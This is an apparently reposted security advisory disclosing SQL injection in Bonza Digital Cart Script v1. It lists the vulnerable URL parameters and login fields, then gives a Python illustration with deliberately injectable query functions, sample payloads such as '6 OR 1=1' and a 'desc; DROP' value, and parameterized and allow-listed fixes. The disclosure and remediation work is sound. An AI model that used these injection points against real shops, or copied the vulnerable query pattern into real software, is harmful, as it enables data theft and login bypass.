Bonza Digital Cart Script 1 SQL Injection

2017.03.24
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

################################################
#Title: Bonza Digital Cart Script v1 - SQL injection
#Credit: Bilal KARDADOU
#Vendor: http://www.turnkeycentral.com
#Vendor URL: http://www.turnkeycentral.com/scripts/bonza-digital-cart-script/
#Product: Bonza Digital Cart Script v1
#Google Dork: N/A
################################################
#
# Product & Service Introduction:
#
# "Bonza Digital Cart"
# Bonza Cart is the perfect solution for Paypal merchants offering downloadable (eGoods)
# and tangible goods for sale who need a full featured storefront & shopping cart,
# secure automated file delivery system & powerful administration backend all in one!
#
# Vulnerable requests ([SQL] marks the parameter value that is passed unsanitized into a query):
#
# http://localhost/bonzacart/viewitem.php?ItemID=6[SQL]
# http://localhost/bonzacart/showcatrows.php?CategoryID=4[SQL]
# http://localhost/bonzacart/cms_pages.php?pn=Disclaimer[SQL]
# http://localhost/bonzacart/showcatrows.php?CategoryID=2&SubcategoryID=3[SQL]
# http://localhost/bonzacart/searchresults.php?SearchTerm=admin[SQL]&ord1=ItemName&ord2=desc[SQL]&search1.x&search1.y&where=ItemDescription[SQL]
#
# Login form, submitted fields:
# http://localhost/bonzacart/checkout.php?cmd=login
# uname=admin[SQL]&upass=adin&submit.x=0&submit.y=0
#
# Note that ord2 and where are not data values but an ORDER BY direction and a column name;
# those cannot be fixed with bound parameters alone and need an allow-list on the server side.
#
# PoC (screenshots):
# http://prnt.sc/en5vqv
# http://prnt.sc/en5vxx
# http://prnt.sc/en5w7t
#
# Bilal KARDADOU - https://www.linkedin.com/in/kardadou/
################################################
--
*Bilal Kardadou*
IT Security Consultant
*E* : b.kardadou@capvalue.ma | *E* : bilalkardadou@gmail.com |
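The advisory lists three kinds of injectable input: an integer ID (ItemID, CategoryID), a quoted string (pn, SearchTerm, uname) and SQL identifiers/keywords (where, ord2). The following script is an added illustration written for this page, not Bonza Cart's code and not the author's PoC; the tables, column names and the `.isdigit()` / allow-list checks are assumptions. It rebuilds each query shape the way a PHP storefront typically concatenates `$_GET` into SQL, shows what a crafted value does to the result set, and puts the parameterized or allow-listed version beside it. It runs offline on an in-memory SQLite database with constructed rows.

```python
import sqlite3


def build_db() -> sqlite3.Connection:
    """Constructed sample data; stands in for the shop's item and CMS page tables."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE items (ItemID INTEGER PRIMARY KEY, ItemName TEXT, Price REAL);
        INSERT INTO items VALUES (4, 'Widget', 9.99), (6, 'Gadget', 19.99), (7, 'Gizmo', 4.50);
        CREATE TABLE cms_pages (pn TEXT PRIMARY KEY, body TEXT);
        INSERT INTO cms_pages VALUES ('Disclaimer', 'No warranty.'), ('Secret', 'internal only');
        """
    )
    return conn


# --- integer parameter (viewitem.php?ItemID=...) ---------------------------

def view_item_vulnerable(conn, item_id: str):
    # Same shape as PHP: "SELECT ... WHERE ItemID=" . $_GET['ItemID']
    # An unquoted number needs no quote-breaking; "6 OR 1=1" is enough.
    sql = "SELECT ItemID, ItemName FROM items WHERE ItemID=" + item_id
    return conn.execute(sql).fetchall()


def view_item_safe(conn, item_id: str):
    # Check the type first (assumed policy), then bind; the value is never SQL text.
    if not item_id.isdigit():
        raise ValueError("ItemID must be an integer")
    return conn.execute(
        "SELECT ItemID, ItemName FROM items WHERE ItemID=?", (int(item_id),)
    ).fetchall()


# --- string parameter (cms_pages.php?pn=...) -------------------------------

def cms_page_vulnerable(conn, pn: str):
    # "SELECT ... WHERE pn='" . $_GET['pn'] . "'": a single quote closes the literal.
    sql = "SELECT body FROM cms_pages WHERE pn='" + pn + "'"
    return conn.execute(sql).fetchall()


def cms_page_safe(conn, pn: str):
    return conn.execute("SELECT body FROM cms_pages WHERE pn=?", (pn,)).fetchall()


# --- identifier / keyword parameters (searchresults.php?...&ord2=...&where=...) -

ALLOWED_WHERE_COLS = {"ItemName", "ItemDescription"}   # assumed column set
ALLOWED_DIRS = {"asc", "desc"}


def search_safe(conn, term: str, where: str, ord2: str):
    # Column names and ORDER BY direction cannot be bound as parameters, so they
    # are validated against a fixed allow-list before being spliced into the SQL;
    # only the search term itself is bound.
    if where not in ALLOWED_WHERE_COLS or ord2.lower() not in ALLOWED_DIRS:
        raise ValueError("unsupported column or sort direction")
    col = "ItemName" if where == "ItemDescription" else where  # sample table has no description
    sql = f"SELECT ItemName FROM items WHERE {col} LIKE ? ORDER BY ItemName {ord2}"
    return [row[0] for row in conn.execute(sql, ("%" + term + "%",)).fetchall()]


def is_rejected(fn, conn, *args) -> bool:
    """True if the hardened function refuses the input instead of querying with it."""
    try:
        fn(conn, *args)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    db = build_db()
    print("vulnerable ItemID=6 OR 1=1 ->", view_item_vulnerable(db, "6 OR 1=1"))
    print("vulnerable pn=Disclaimer' OR '1'='1 ->", cms_page_vulnerable(db, "Disclaimer' OR '1'='1"))
    print("safe pn with same payload ->", cms_page_safe(db, "Disclaimer' OR '1'='1"))
    print("safe search rejects ord2=desc; DROP ->", is_rejected(search_safe, db, "i", "ItemName", "desc; DROP"))
```

The vulnerable functions return every row for the crafted values, which is the behaviour the advisory's [SQL] markers point at; the hardened ones either bind the value (so `Disclaimer' OR '1'='1` simply matches no page) or refuse it outright. The allow-list for `where` and `ord2` is the part most often missed when such scripts are patched with a quick `mysql_real_escape_string` pass, since escaping does nothing for an identifier that was never quoted.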


Copyright 2018, cxsecurity.com